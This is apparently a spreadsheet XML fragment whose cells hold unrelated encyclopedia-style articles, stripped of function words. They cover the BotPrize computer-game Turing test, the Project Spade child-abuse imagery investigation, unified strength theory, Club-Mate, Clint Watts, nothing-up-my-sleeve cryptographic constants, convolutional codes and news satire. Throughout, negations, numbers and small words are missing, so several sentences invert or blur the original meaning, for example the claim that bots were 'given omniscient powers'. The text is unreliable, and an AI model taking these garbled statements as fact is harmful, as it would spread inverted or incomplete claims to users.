    <t>computer game turing test variant turing test, human judge viewing interacting virtual world must distinguish humans game bots, interacting virtual world. this variant first proposed 2008 associate professor philip hingston edith cowan university, implemented tournament called botprize. history computer game turing test proposed advance fields artificial intelligence computational intelligence respect video games. considered poorly implemented implied subpar game, would capable passing test, therefore might indistinguishable human player, would directly improve quality game. also served debunk flawed notion "game solved problem."emphasis placed game interacts players multiplayer environment. unlike simply needs make optimal human-like decisions play beat game, must make decisions also convincing another in-game player human-likeness. implementation computer game turing test designed test bot's ability interact game environment comparison human player, simply 'winning' insufficient. this evolved contest important goals mind: there three participants: human player, computer-game bot, judge. needs appear human-like human player. judge scores bipolar human scored anywhere scale (1=not humanlike, 5=human). three participants indistinguishable arena, exception randomly generated name tag, reduce chance random elements name appearance influencing judges. chat disabled throughout match. bots given omniscient powers games. bots must react data might reasonably available human player. human participants moderate skill range, participant either ignorant game capable playing professional level.in 2008, first botprize tournament took place. contest held game unreal tournament 2004 platform. contestants created bots advance using gamebots interface. gamebots modifications made adhere conditions, removing data vantage points weapon damage unfairly informed bots relevant strengths/weakness human would otherwise need learn. tournament first botprize tournament held perth, australia, december 2008, part 2008 ieee symposium computational intelligence games. each competing team given time adjust bots modified game client, although coding changes allowed point. tournament rounds, 10-minute death match. judges last join server every judge observed every player every exactly once, although pairing players bots change. when tournament ended, rated human player. subsequent tournaments, 2009–2011, bots achieved scores increasingly human-like, contestant botprize contests. 2012, annual botprize held again, teams programmed bots achieved scores greater human players. successful bots date, successfully programmed bots passed computer game turing test: ut^2, team university texas austin, emphasized adjusted behaviour based previously observed human behaviour neuroevolution. team made available, although copy unreal tournament 2004 required. short video available youtube. mihai polceanu, doctoral student romania, focused creating would mimic opponent reactions, sense 'borrowing' human-like nature opponent.comments winners found detail botprize website. these victors succeeded year 2012, alan turing's centenary year. aftermath outcome appears human-like human player possibly overstated, since tournament bots succeeded, average 'humanness' rating human players 41.4%. this showcases limits turing test, since results demonstrate human behaviour complicated quantitative accounted for. light this, botprize competition organizers increase difficulty upcoming years challenges, forcing competitors improve bots.it also believed methods techniques developed computer game turing test useful fields video games, virtual training environments improving robot-human interaction. contrasts turing test computer game turing test differs traditional generic turing test number ways: unlike traditional turing test, example chatterbot-style contest held annually loebner prize competition, humans played computer game bots trying convince judges human; rather, want game (i.e., achieving highest kill score). judges restricted awarding participant match 'human' 'non-human.' this emphasizes qualitative rather polarized findings. with regards successful computer game bot, confused claim 'intelligent,' whereas machine 'passed' turing test would arguably evidence chatterbot's 'intelligence.' game unreal tournament 2004 chosen commercial availability interface creating bots, gamebots. this limitation medium sharp contrast turing test, emphasizes conversation, possible questions vastly numerous possible actions available specific video game. available information participants, humans bots, equal. humans interact vision sound, whereas bots interact data events. judges cannot introduce events (e.g., lava pit) differentiating human bot, whereas chatterbot designed system, judges theoretically question manner. participants judge take part three-way interaction, unlike, example, paired two-way interaction loebner prize contest. also virtual reality turing test graphics turing test loebner prize, contest implements 'traditional' turing test rog-o-matic, 1984 plays 1980s dungeon crawler rogue references</t>
  </si>
  <si>
    <t>2013 International child pornography investigation</t>
  </si>
  <si>
    <t>project spade, international police investigation child pornography, began october 2010 toronto, canada. investigation started toronto police service officers made on-line contact alleged sharing pornographic videos internet mail. investigation eventually covered countries. people arrested internationally, children said rescued. primary producers igor rusanov andrey ivanov crimea, ukraine, markus roth romania, paul kruger germany. investigation following numerous complaints received website cybertip.ca azov films, investigation began october 2010 undercover police made online contact brian way, 42-year-old toronto owner toronto-based azov films, firm distributed dvds streaming videos naked children marketed "naturist."in 2011 way's home office raided, arrested. toronto enforcement authorities u.s. postal inspection service recreated way's customer records shared royal canadian mounted police interpol. investigations involved countries. alleged earned million website.apart canada, australia united states, authorities hong kong, south africa, spain sweden involved. investigations also spread greece, ireland, zealand, norway.the canadian operation "project spade", australia "operation thunderer". terabytes images videos seized.inspector joanna beaven-desjardins, tps' crimes unit, said, "it's first magnitude victims saved" "the amount arrests internationally, also first." beaven-desjardins also spoke materials seized way's home: "officers located hundreds thousands images videos detailing horrific sexual acts young children, worst ever viewed." materials distributed commercially azov featured nude athletic recreational scenes, explicit sexual acts. nudity-only nature azov material caused classified level copine scale rating images children, i.e., generally beneath threshold legal interest. this standardized rating caused controversy, politicians members press later accused national crime agency negligence.the investigation officially made public november 2013. alternative news sources disclosed existence early december. 2012 germany german federal criminal police office informed october 2011, investigations started october 2012, list customers distributed german states' authorities november 2012. during months holding back investigations obvious federal criminal police office within list ip-numbers deutscher bundestag least several downloads nude material boys towards german bundestag ip-numbers range.five hundred listed persons purchased unambiguous child pornography according german legal standards; rest bought material considered illegal. german appeared list; since material purchased categorized clearly illegal, case held back pending investigations, february 2014, house raided. according jörg fröhlich, public prosecutor hannover, lower saxony, raid took place reason higher count public prosecutor agencies handling similar cases account agencies favoring found material would need categorized so-called "ii" instead "i". passing secret information regarding investigation mp's party leader resulted resignation former german interior minister, hans-peter friedrich. home raid edathy purchased materials classified legal criticized national newspaper, zeit, guest editorial thomas fischer, chief judge german federal court. stated, "law exists clear boundaries permitted forbidden behavior. justice dares follow nothing illegal. edathy case, rule violated." contrast, however, mick moran, head interpol's human trafficking child exploitation unit, issued public warning twitter "maps" ("minor-attracted persons") sign acting upon sexual orientations, whether actions legal illegal, "demonstrates escalation activity 'maps' must interpreted increased risk children regardless illegality" "must result action public safety officials." public discussion nude pictures children legal germany, categorized sexual nature, within hours published consent parliamentary parties, well germany's minister justice heiko maas, prompt change relevant law. february 2014, non-public meeting federal home affairs committee president jörg ziercke reporting affair—ziercke admitted, according bosbach—who leads committee—towards reporters, seen reason publish involved mp's name earlier, since time sebastian edathy head nsu-murderseries committee inquiries therefore himself, ziercke, prevent obviously wrong public image nonexisting revenge. children apart children involved production azov films, children said rescued exploitation purchasers films. canada alone, rescued rescued australia. "more children" stated rescued this high number questioned, since full details charges total arrests publicly released november 2013, details account fewer persons exposed children current historical sexual contact. additional children surreptitiously indecently photographed, mostly arrested school employees. definition "rescued child" used "the children either sexually abused sexually exploited videos taken exploitative positions." 'exploitative positions' always included nudity genital exposure. arrests november 2013, people arrested internationally. those arrested included priests pastors, teachers, foster parents, doctors nurses. police officer youth baseball coach also arrested. richmond, virginia, sentenced months prison april 2013, receipt child pornography.in canada alone people arrested. arrested. australia arrests began august 2013 persons aged arrested. spain arrested december 2012. charges charged offenses. charges include "instruction criminal organisation" "making, possessing, distributing exporting child exploitation "explicit images boys ranging toddlers teens." way's mother, sandra waslov, still sought authorities. waslov changed name 2010 orchard park, erie county, york.the australian suspects face charges involving child exploitation. charges include accessing, possessing, producing distributing online child exploitation material". suicide government official high-impact arrests resulting project spade ryan loskarn. 35-year-old chief staff u.s. sen. lamar alexander time arrest. investigation loskarn's electronic equipment prompted part appearance name azov films customer list. uncovered graphic child pornography obtained gnutella peer-to-peer network loskarn charged possessing intending distribute child pornography released recognizance five days arrest december 2013. january 2014, committed suicide hanging parents' home. suicide note, published internet family, stated found drawn videos matched childhood abuse." incident provoked wide discussion washington, washington post opinion writer ruth marcus suggesting episode call attention need mental health services—although loskarn's problem lack access lack willingness accept help available also moment remind reality complex cursory assumptions acknowledge, rush condemn might pause consider possibility compassion." suicide martin goldberg martin goldberg, deputy headteacher essex, hung investigated following information uncovered canada. approximately indecent images children found possession schools' changing rooms; taken swimming pools local leisure centre locations.the headteacher school worked said felt "utter shock betrayal" goldberg's behavior, brought attention essex police 2013. also 2007 international child pornography investigation operation avalanche (child pornography investigation) 1999 operation delego 2009 references</t>
  </si>
  <si>
    <t>Unified strength theory</t>
  </si>
  <si>
    <t>unified strength theory (ust). proposed mao-hong series yield criteria (see yield surface) failure criteria (see material failure theory). generalized classical strength theory used describe yielding failure material begins combination principal stresses reaches critical value. mathematical formulation mathematically, formulation expressed principal stress state {\displaystyle {\sigma _{1}},{\sigma _{2}},{\sigma _{3}}} three principal stresses, {\displaystyle {\sigma _{t}}} uniaxial tensile strength {\displaystyle \alpha tension-compression strength ratio {\displaystyle \alpha ={\sigma _{t}}/{\sigma _{c}}} unified yield criterion (uyc) simplification {\displaystyle \alpha i.e. limit surfaces unified strength theory limit surfaces unified strength theory principal stress space usually semi-infinite dodecahedron cone unequal sides. shape size limiting dodecahedron cone depends parameter {\displaystyle \alpha limit surfaces shown follows. derivation unified strength theory relation {\displaystyle {\tau _{13}}={\tau _{12}}+{\tau _{23}}} principal stress state {\displaystyle {\sigma _{1}},{\sigma _{2}},{\sigma _{3}}} converted twin-shear stress state {\displaystyle {\tau _{13}},{\tau _{12}};{\sigma _{13}},{\sigma _{12}}} {\displaystyle {\tau _{13}},{\tau _{23}};{\sigma _{13}},{\sigma _{23}}} twin-shear element models proposed mao-hong used representing twin-shear stress state. considering stress components twin-shear models different effects yields unified strength theory relations among stresses components principal stresses read {\displaystyle \beta obtained uniaxial failure state substituting eqs.(4a), (4b) (5a) eq.(3a), substituting eqs.(4a), (4c) (5b) eq.(3b), {\displaystyle \beta introduced history unified strength theory development unified strength theory divided three stages follows. twin-shear yield criterion (ust {\displaystyle \alpha {\displaystyle b=1} twin-shear strength theory (ust {\displaystyle b=1} unified strength theory. applications unified strength theory unified strength theory used generalized plasticity, structural plasticity, computational plasticity many fields references</t>
  </si>
  <si>
    <t>Club-Mate</t>
  </si>
  <si>
    <t>club-mate (german pronunciation: [ˈklʊp ˈmaːtə]) caffeinated carbonated mate-extract beverage made loscher brewery (brauerei loscher) near münchsteinach, germany, originated 1924. club-mate caffeine litre. club-mate relatively sugar content litre, calories (200 kcal litre beverage) compared beverages cola energy drinks. club-mate available 0.33-litre 0.5-litre bottles. some club-mate bottles include slogan "man gewöhnt sich daran" roughly translates challenge drinker “one gets used it." examples club-mate-based mixed drinks are: vodka-mate; tschunk, combination club-mate; jaeger-mate, jägermeister club-mate. history geola beverages dietenhofen, germany originally formulated marketed club-mate name sekt-bronte since 1924. drink known regionally acquired loscher marketed name club-mate 1994.in december 2007, loscher marketed club-mate winter edition. limited-edition club-mate consists original formula mixed cardamom, cinnamon, star anise citrus extract. since sold regularly limited time winter. 2009, club-mate-styled cola variety introduced. unlike colas, recipe includes mate-extract. 2013, club-mate granat, club-mate variety additional pomegranate flavor, introduced. july 2010, company listed additional countries like united kingdom, united states, belgium, bulgaria luxembourg reach distributors countries, primarily europe, also canada, australia, israel, turkey, taiwan south africa. hacker culture club-mate developed following computer hacker culture tech start-ups, especially europe. bruce sterling wrote wired magazine favorite beverage germany's chaos computer club. also popular noisebridge hope united states, electromagnetic field hack-tic events netherlands fosdem belgium. club-mate appeared numerous leading media websites like al-jazeera, techcrunch vice. ingredients variations water inverted sugar syrup sugar mate extract citric acid caffeine natural flavors caramel color carbonic acidthere several variations original recipe available: club-mate icet kraftstoff iced-tea variant slightly higher caffeine content (220 sugar), club-mate granat (with added pomegranate fruity taste) club-mate winter edition (with spices giving gingerbread-like taste edition available winter months). tschunk tschunk [ˈtʃʊnk] german highball consisting club-mate white brown rum. usually served limes cane brown sugar.like club-mate, tschunk typical drink within european hacker culture often found scene typical events locations like chaos communication congress. also materva, cuban carbonated mate-based beverage notes references external links home page club-mate "history loscher brewery. includes information acquisition geola beverages" german). archived original 2007-10-11. retrieved 2008-05-23.</t>
  </si>
  <si>
    <t>Clint Watts</t>
  </si>
  <si>
    <t>clint watts senior fellow center cyber homeland security george washington university foreign policy research institute fellow. previously infantry officer united states army, executive officer combating terrorism center united states military academy west point (ctc). became special agent federal bureau investigation served joint terrorism task force (jttf). consulted counterterrorism division (ctd) national security branch (nsb).watts given expert testimony u.s. congress multiple times, including: u.s. senate committee homeland security governmental affairs april 2016, isis's november 2015 paris attacks 2016 brussels bombings, u.s. house committee foreign affairs isis orlando nightclub shooting, senate intelligence committee russian interference 2016 u.s. elections widely reported march 2017 public hearing, u.s. senate armed services subcommittee cybersecurity april 2017, russian black propaganda.his testimony senate intelligence committee russian cyberwarfare tactics made multiple headlines, slate calling "testifier extraordinaire" star hearing. afterwards, profiled piece reported targeted russian information warfare documented internet troll techniques. comment "follow trail dead russians" seen particularly noteworthy news, salon, american interest. education watts received bachelor science degree united states military academy 1995. subsequently, garnered master arts graduating middlebury institute international studies 2005. career u.s. army officer watts served united states army officer infantry. executive officer combating terrorism center united states military academy west point (ctc). after september attacks, recruited federal bureau investigation, help coordinate efforts combating terrorism across multiple agencies. agent watts worked special agent federal bureau investigation. capacity served joint terrorism task force (jttf). watts consulted counterterrorism division (ctd) national security branch (nsb). national security research watts foreign policy research institute (fpri) fellow. joined fpri 2011, became robert fellow fpri initiative focusing middle east studies. senior fellow center cyber homeland security george washington university. consulting work teaches police agencies, intelligence sources, military.watts wrote daily beast august 2016 russian propaganda fabricated articles popularized social media. watts along colleague andrew weisburd documented disinformation spread russia today sputnik news, "the biggest russian state-controlled media organizations publishing english", pro-russian accounts twitter. citing research adrian chen, weisburd watts compared russian tactics 2016 u.s. election soviet union cold strategies. they referenced 1992 united states information agency report congress, warned russian propaganda called active measures. they concluded social media made active measures easier.weisburd watts collaborated colleague berger published follow-up daily beast article online magazine rocks, titled: "trolling trump: russia trying destroy democracy". they researched 7,000 pro-trump accounts two-and-a-half year period. their research detailed trolling techniques denigrate critics russian activities syria, proliferate lies clinton's health. watts said russia's goal elect donald trump president united states erode trust mainstream media, public figures, government institutions". claimed propaganda targeted alt-right, right wing, fascist groups. after presidential debate, thousands twitter bots used hashtag #trumpwon change perceptions. november 2016 foreign policy research institute stated russian propaganda exacerbated criticism clinton support trump. strategy involved social media, paid internet trolls, botnets, websites order denigrate clinton.in october 2020, watts stated "russia threat election influence. 2021 beyond, china around world right now, china really beating u.s. advancing vision meritocracy democracy, vision human rights versus american vision human rights, maligning u.s. covid-19 response. tied politics. we've kind missed china really advanced abroad." u.s. congress testimony watts testified united states senate committee homeland security governmental affairs april 2016, islamic state iraq levant's november 2015 paris attacks 2016 brussels bombings. submitted testimony united states house committee foreign affairs june 2016, subject isis strategies, wake orlando nightclub shooting.he testified expert witness russian interference 2016 united states elections, march 2017 hearing united states senate select committee intelligence. testimony senate intelligence committee well received, made multiple headlines. slate referred headline "clint watts, testifier extraordinaire", "the star march’s senate intelligence committee hearing". profiled testimony piece "russia investigation: clint watts", noted gained knowledge field russian cyber hacking methods, target 2015 following "trolling trump" article; notified foreign policy research institute attack. salon compared testimony "follow trail dead russians" john dean's statement cancer presidency". this phrase testimony watts highlighted media, including news, american interest, oregonian. u.s. senator wyden found comment important investigation. mark shields newshour found testimony "compelling", called "blistering". jennifer rubin wrote washington post testimony "laid comprehensive look array tools russia used influence election". after testimony, appeared nbc's meet press explained ways u.s. better respond cyberwarfare. currently, consultant contributor msnbc. appeared united states senate armed services subcommittee cybersecurity april 2017, subject cyber warfare national security, spoke strategies russia using black propaganda. selected bibliography watts, clint (december 2011), "capturing potential outlier ideas intelligence community" (pdf), studies intelligence, watts, clint (2012), radicalization u.s. beyond qaeda: treating disease disconnection (pdf), foreign policy research institute, oclc 940429317 watts, clint (june 2016), "directing inspiring: isis' evolving tactics orlando terrorist attack" (pdf), statement prepared united states house representatives committee foreign affairs, subcommittee terrorism, nonproliferation trade, united states house representatives, retrieved june 2017 weisburd, andrew; watts, clint; berger, november 2016), "trolling trump: russia trying destroy democracy", rocks, retrieved december 2016 watts, clint; weisburd, andrew august 2016), "trolls trump russia dominates your twitter feed promote lies (and, trump, too)", daily beast, retrieved november 2016 watts, clint (march 2017), "clint watts' testimony: russia's info u.s. started 2014", daily beast, retrieved june 2017 watts, clint (april 2017), "inside russia's fake news playbook", daily beast, retrieved june 2017 watts, clint (2018), messing enemy: surviving social media world hackers, terrorists, russians, fake news, harper, isbn 978-0062795984 also cyberwarfare russia counterintelligence division foreign electoral intervention russian espionage united states timeline russian interference 2016 united states elections timeline russian interference 2016 united states elections (july 2016–election day) timeline post-election transition following russian interference 2016 united states elections brigades trolls olgino russian state-sponsored internet sockpuppetry references external links clint watts, foreign policy research institute clint watts, rocks appearances c-span clint watts bio, united states senate clint watts twitter</t>
  </si>
  <si>
    <t>Nothing-up-my-sleeve number</t>
  </si>
  <si>
    <t>cryptography, nothing-up-my-sleeve numbers numbers which, construction, suspicion hidden properties. they used creating cryptographic functions hashes ciphers. these algorithms often need randomized constants mixing initialization purposes. cryptographer wish pick values demonstrates constants selected nefarious purpose, example, create backdoor algorithm. these fears allayed using numbers created leaves little room adjustment. example would initial digits number constants. using digits millions places decimal point would considered trustworthy algorithm designer might selected starting point created secret weakness designer could later exploit. digits positional representations real numbers irrational roots believed appear equal frequency (see normal number). such numbers viewed opposite extreme chaitin–kolmogorov random numbers appear random information entropy. their motivated early controversy u.s. government's 1975 data encryption standard, came criticism explanation supplied constants used s-box (though later found carefully selected protect then-classified technique differential cryptanalysis). thus need felt transparent generate constants used cryptography. "nothing sleeve" phrase associated magicians, sometimes preface magic trick holding open sleeves show objects hidden inside. examples rivest used trigonometric sine function generate constants widely used hash. u.s. national security agency used square roots small integers produce constants used "secure hash algorithm" sha-1. sha-2 functions square roots cube roots small primes. sha-1 also uses 0123456789abcdeffedcba9876543210f0e1d2c3 initial hash value. blowfish encryption algorithm uses binary representation (without initial initialize schedule. 3526 describes prime numbers internet exchange also generated s-box newdes cipher derived united states declaration independence. candidate derives arbitrary constants, including entries s-box, binary expansion aria schedule uses binary expansion 1/π. schedule cipher uses binary digits golden ratio. multiple ciphers including pike 2654435769 0x9e3779b9 ⌊232/ϕ⌋, golden ratio. blake hash function, finalist sha-3 competition, uses table constant words leading 1024 bits fractional part schedule kasumi cipher uses 0x123456789abcdeffedcba9876543210 derive modified key. salsa20 family ciphers ascii string "expand 32-byte constants block initialization process. bcrypt uses string "orpheanbeholderscrydoubt" initialization string counterexamples streebog hash function s-box claimed generated randomly, reverse-engineered proven generated algorithmically "puzzling" weaknesses. data encryption standard (des) constants given nsa. they turned random, instead made algorithm resilient differential cryptanalysis, method publicly known time. dual_ec_drbg, nist-recommended cryptographic pseudo-random generator, came criticism 2007 constants recommended algorithm could selected would permit author predict future outputs given sample past generated values. september 2013 york times wrote "internal memos leaked former contractor, edward snowden, suggest generated random number generators used 2006 nist standard—called dual drbg standard—which contains back door nsa." curves standardized nist elliptic curve cryptography. coefficients curves generated hashing unexplained random seeds, p-224: bd713447 99d5c7fc dc45b59f a3b9ab8f 6a948bc5. p-256: c49d3608 86e70493 6a6678e1 139d26b7 819f7e90. p-384: a335926a a319a27a 1d00896a 6773a482 7acdac73.although directly related, backdoor dual_ec_drbg exposed, suspicious aspects nist's curve constants concerns chosen values gave advantage finding private keys. since then, many protocols programs started curve25519 alternative nist p-256 curve. longer trust constants. believe manipulated relationships industry. limitations bernstein coauthors demonstrate nothing-up-my-sleeve numbers starting point complex procedure generating cryptographic objects, elliptic curves, sufficient prevent insertion back doors. enough adjustable elements object selection procedure, universe possible design choices apparently simple constants large enough search possibilities allows construction object desired backdoor properties. footnotes references bruce schneier. applied cryptography, second edition. john wiley sons, 1996. biham, shamir, (1990). differential cryptanalysis des-like cryptosystems. advances cryptology crypto '90. springer-verlag. 2–21.</t>
  </si>
  <si>
    <t>Serial concatenated convolutional codes</t>
  </si>
  <si>
    <t>serial concatenated convolutional codes (sccc) class forward error correction (fec) codes highly suitable turbo (iterative) decoding. data transmitted noisy channel first encoded using sccc. upon reception, coding used remove errors introduced transmission. decoding performed repeated decoding [de]interleaving received symbols. scccs typically include inner code, outer code, linking interleaver. distinguishing feature scccs recursive convolutional code inner code. recursive inner code provides 'interleaver gain' sccc, source excellent performance codes. analysis scccs spawned part earlier discovery turbo codes 1993. this analysis sccc's took place 1990s series publications nasa's propulsion laboratory (jpl). research offered sccc's form turbo-like serial concatenated codes iteratively ('turbo') decodable reasonable complexity, gave error correction performance comparable turbo codes. prior forms serial concatenated codes typically recursive inner codes. additionally, constituent codes used prior forms serial concatenated codes generally complex reasonable soft-in-soft-out (siso) decoding. siso decoding considered essential turbo decoding. serial concatenated convolutional codes found widespread commercial use, although proposed communications standards dvb-s2. nonetheless, analysis scccs provided insight performance bounds types iterative decodable codes including turbo codes ldpc codes.us patent 6,023,783 covers forms scccs. patent expired 2016. history serial concatenated convolutional codes first analyzed view toward turbo decoding "serial concatenation interleaved codes: performance analysis, design, iterative decoding" benedetto, divsalar, montorsi pollara. this analysis yielded observations designing high performance, turbo decodable serial concatenated codes resembled turbo codes. observations "the recursive convolutional inner encoder always yields interleaver gain." this contrast block codes non-recursive convolutional codes, provide comparable interleaver gain. additional analysis scccs done "coding theorems 'turbo-like' codes" divsalar, jin, robert mceliece. this paper analyzed repeat-accumulate (ra) codes serial concatenation inner two-state recursive convolutional code (also called 'accumulator' parity-check code) simple repeat code outer code, codes linked interleaver. performance codes quite good considering simplicity constituent codes themselves. sccc codes analyzed "serial turbo trellis coded modulation rate-1 inner code". paper scccs designed higher order modulation schemes. excellent performing codes inner outer constituent convolutional codes four states presented. example encoder example sccc. example encoder composed 16-state outer convolutional code 2-state inner convolutional code linked interleaver. natural code rate configuration shown 1/4, however, inner and/or outer codes punctured achieve higher code rates needed. example, overall code rate achieved puncturing outer convolutional code rate inner convolutional code rate 2/3. recursive inner convolutional code preferable turbo decoding sccc. inner code punctured rate high reasonable performance. example decoder example iterative sccc decoder. sccc decoder includes soft-in-soft-out (siso) decoders interleaver. while shown separate units, siso decoders share part circuitry. siso decoding done serial parallel fashion, combination thereof. siso decoding typically done using maximum posteriori (map) decoders using bcjr algorithm. performance scccs provide performance comparable iteratively decodable codes including turbo codes ldpc codes. they noted slightly worse performance lower environments (i.e. worse waterfall region), slightly better performance higher environments (i.e. lower error floor). also convolutional code viterbi algorithm soft-decision decoding interleaver bcjr algorithm low-density parity-check code repeat-accumulate code turbo equalizer references external links "concatenated codes", scholarpedia "concatenated convolutional codes iterative decoding", willian ryan</t>
  </si>
  <si>
    <t>News satire</t>
  </si>
  <si>
    <t>news satire news comedy type parody presented format typical mainstream journalism, called satire content. news satire around almost long journalism itself, particularly popular web, websites like onion babylon bee, relatively easy mimic legitimate news site. news satire relies heavily irony deadpan humor. slightly different types news satire exist. form uses satirical commentary sketch comedy comment real-world events, presents wholly fictionalized news stories. history author samuel clemens (mark twain) employed newspaper reporter becoming famous novelist, position published many satirical articles. left separate journalism positions, nevada (1864) fleeing challenge duel francisco fleeing outraged police officials satire fiction often taken truthful accounts presented ironically, accuracy many newspaper autobiographical accounts used follow early life samuel clemens doubt.newspapers still print occasional news satire features, particular april fools' day. this news specifically identified somewhere paper next joke. 1933 1934, metro-goldwyn-mayer released series one-reel theatrical shorts called goofy movies, included "wotaphony newsreel", newsreel parody paired actual footage mocking, deadpan narration.also 1934, halfway kraft music hall radio show, dean taylor ("others collect news, dean makes it!") narrated fake newsreel began report york giants philadelphia phillies cancelled weather, baseball season rescheduled farmers need rain. television news satire prevalent television since 1960s, enjoyed renaissance "satire boom", comedians including peter cook, alan bennett, jonathan miller, david frost, eleanor bron, dudley moore, television program that week that was. united states, network adapted program also produced content, "news" segment rowan martin's laugh-in, still-running saturday night live mock newscast segment "weekend update". cable television cable news home office's necessarily news mid-1980s.in 2000s, comedy central's daily show became icon american political satire genre, stewart delved opinionated political criticism. spinoff, stephen colbert's colbert report, also enjoyed high level popularity 9-year run.the 2004 national annenberg election survey found daily show viewers better informed relied solely conventional network news, steven young angeles daily news compares trust influence long-time host stewart enjoyed anchor walter cronkite 1970s. however, study published journal communication suggests news entertainment shows daily show colbert report influential teaching voters political issues candidates previously thought. researchers ohio state university found reasons discount effective shows informing general public. people watching television news learned candidate's position issues political procedures compared watching news entertainment shows, news entertainment shows primarily taught viewers candidate’s personal background.after success daily show, news launched news satire program february 2007 title hour news hour. creator describes "the daily show conservatives", canceled within months. news launched successful series february 2007 april 2017. 2017, news satire united states remains popular, especially late night television; late-night talk shows often incorporate elements news satire. current american programs known primarily news satire include hosted former correspondents daily show (john oliver's last week tonight, samantha bee's full frontal, daily show trevor noah's tenure), well bill maher's real time.in britain, several news satires created, famously works chris morris. shows radio series hour television version today parodied news programs accurately, almost believable could confused actual news programs, fake stories reported. morris went continue several themes brass eye, controversial series british television, especially episode broadcast mocked news covered stories pedophilia. previous news satire shows britain include: late edition marcus brigstocke, digital station four, heavily influenced daily show; news knight trevor mcdonald, parodied news differently using actual newsreader host; broken news, featured several sketches different news channels blending other.as 2018, current british news-related programs described satire include: have news mock week bbc; channel last leg; itv's newzoids; dave's unspun matt forde.recent news satire television series australia include working productions' frontline, shaun micallef's newstopia, many programs created chaser since 2001. 2017, current programs australian broadcasting corporation include shaun micallef's hell weekly charlie pickering.in canada, this hour minutes ensemble news satire show four anchors cbc. rick mercer report spinoff minutes former anchor rick mercer, also shown cbc. radio features this that, improvised news satire program mimics style actual radio public affairs programs. 1960s series this hour seven days, although primarily real newsmagazine, included satirical features format, political humor songs actress singer dinah christie. french-language television networks quebec, noted news satire shows included monde heures, dieu créa... laflaque infoman.in germany, heute-show (zdf), formerly wochenshow sat.1) freitag nacht news rtl) popular news satires tv.the egyptian show bernameg, hosted bassem youssef capital broadcast center 2011-13 masr 2014 on), modeled daily show. launched wake egyptian revolution 2011, quite popular, also source tremendous controversy, youssef repeatedly investigation authorities willingness poke powerful people.in france, rendez-vous avec kevin razy canal+ hosted comedian kévin razy 2017 2019 modeled last week tonight 'the tonight show' band. online news satire posted almost since inception, onion foremost among recognized news satire sites enduring profitable business model. content website, started 1996, syndicated mainstream media sites cnet. today hundreds news satire sites online, among babylon bee, considered politically conservative counterpart onion also visited two. sites hollywood leek specialize satirical articles celebrities hollywood entertainment news. sometimes fake news reporters influence real world politics, like citizen kate whose episodes covered 2008 presidential campaign trail. commissioned butter bust obama presented butter lady iowa, making international headlines. koshary today egyptian website carries fake international news stories. other satire sites attempt emulate genuine news source sort; sites take variety forms.because interesting stories often emailed quickly become separated point origin, uncommon news satire stories picked real media, happened faking news story lawsuit indian failed attract girl. additionally, parody post sharpton's parody news groper blog quoted real msnbc. another satire publication, giant napkin, published article literally fighting house fire fire, story taken seriously several social networking sites. that google news accepts news satire sources helps contribute phenomenon; google news mark stories "satire" tag, readers notice tag; moreover, sometimes satirical sources carry tag. least site, thespoof.com, relies user-generated content manner. some websites like literally unbelievable post genuine shocked reactions individuals believe satirical articles real. reactions taken social media websites, facebook, users directly comment links article's source. multi-author indian website news that matters not, launched november 2009, manthan south asia award socially responsible e-content (digital inclusion development), organized digital empowerment foundation. india, several community-based news satire websites crept recent times. their popularity facebook defines popular amongst masses. very websites scoop times, fakekhabar.com, sunkey.co.in unreal times also claim students, covered times india july 2011.a plethora news satire sites participate hosted community site, additionally runs satire news feed humorfeed. humorfeed notable relatively high standards admission active community involvement. present, sites contributing members, least eight published books publish regular hard-copy periodicals. several humorfeed members also check please!, online journal devoted serious examination online satire, ranging role relation actual journalism practical considerations producing online satire site.in july 2009, satire piece kanye west published website scrapetv picked numerous media outlets reported factual, despite disclaimers site.satirical twitter accounts news sources popular, often mistaken legitimate sources. online publications made quizzes challenging users distinguish tweets real vice tweets parodies. @salondotcom parody account confused many twitter users real salon.com reported impersonation.in pakistan, khabaristan times (kt) renowned satire parody website commentary pakistani politics military. 2015, satirical piece website went viral international media outlets including york times reported story true. 2017, reportedly blocked pakistan, however, appeared available users outside pakistan.in middle east, pan-arabia enquirer widely read satirical news website. gained notoriety 2013 article emirates launching shisha lounges fleet a380s picked fact news websites around world. alhudood, another middle eastern satire news publisher, gained publicity region published article jordanian police arresting santa claus confiscating gifts paying customs entering jordan.in turkey, zaytung become source mass reading since socio-political gezi park 2013 protests turkey. caribbean, trinidad tobago-based website wired868 satirical columnists pseudonyms live wire filbert street, comment satirically relevant political news stories fall power ex-fifa vice-president jack warner, media issues, general news challenges faced former prime minister kamla persad-bissessar people's partnership coalition government.in australia, numerous satirical news websites including damascus dropbear (christian satire), shovel, betoota advocate, (un)australian, fault report, sauce tunnel presents. shovel mainly satirizes australian political social culture betoota advocate satirizes political right australian journalism. february 2015, betoota advocate shot fame publication's editor's sneaked media scrum outside parliament house canberra leadership spill motion managed interview australia's high-profile media personalities politicians, posing legitimate journalists. fallout betoota advocate stunt security increase surrounding parliamentary media screening crew. fault report established 2014 also political editorial focus. british-born australian author john birmingham described fault report "like onion. vegemite", blog cheeseburger gothic. tunnel presents, online since june 2011, brisbane-based satire writing team tunnel political social satire stories queensland focus.in italy, famous website specialized mock-journalism lercio. born parody popular press, addition tabloid press, goals also domestic foreign politics. website created 2012 editorial staff composed authors contributed palestra, column wanted blog comedian satirical author daniele luttazzi. years lercio publication book collection 2014 best articles. from year lercio present national radio daily strip. thanks many fans articles shared social network good success and, mostly beginning history, articles taken true national press.in hungary, hírcsárda number news satire medium. site, started 2010, drawn public attention hungarian government demanded article emended dealt state secretary education rózsa hoffmann. page since threatened various celebrities, remained active regardless. also present hungary központi újság (central news), news satire website joke party. :)hungarian two-tailed party. popular canadian satirical news websites include beaverton, daily bonnet, walking eagle news. also list satirical television news programs list satirical news websites references</t>
  </si>
  <si>
    <t>Jeremy Renner Official</t>
  </si>
  <si>
